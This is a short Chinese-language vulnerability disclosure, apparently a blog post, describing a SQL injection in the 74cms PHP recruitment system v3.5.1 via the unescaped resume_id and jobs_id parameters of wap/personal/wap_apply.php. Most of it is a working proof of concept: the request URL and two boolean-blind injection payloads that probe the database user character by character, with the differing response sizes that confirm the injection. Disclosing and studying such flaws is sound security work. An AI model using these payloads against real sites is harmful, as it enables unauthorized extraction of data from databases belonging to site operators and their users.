74cms SQL注入漏洞

骑士PHP人才系统:74cms_v3.5.1_20141020.zip
之前出的 最新版本
漏洞文件:\wap\personal\wap_apply.php

resume_id 和jobs_id 2个参数都没进行’保护 遂造成注入
先注册个用户

http://127.0.0.1/74cms/upload/wap/personal/wap_apply.php?act=apply_add

post:resume_id=1&jobs_id=23 and if(ascii(substr(user(),1,1))=113,1,null)%23
74

post:resume_id=1&jobs_id=23 and if(ascii(substr(user(),1,1))=114,1,null)%23

742

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录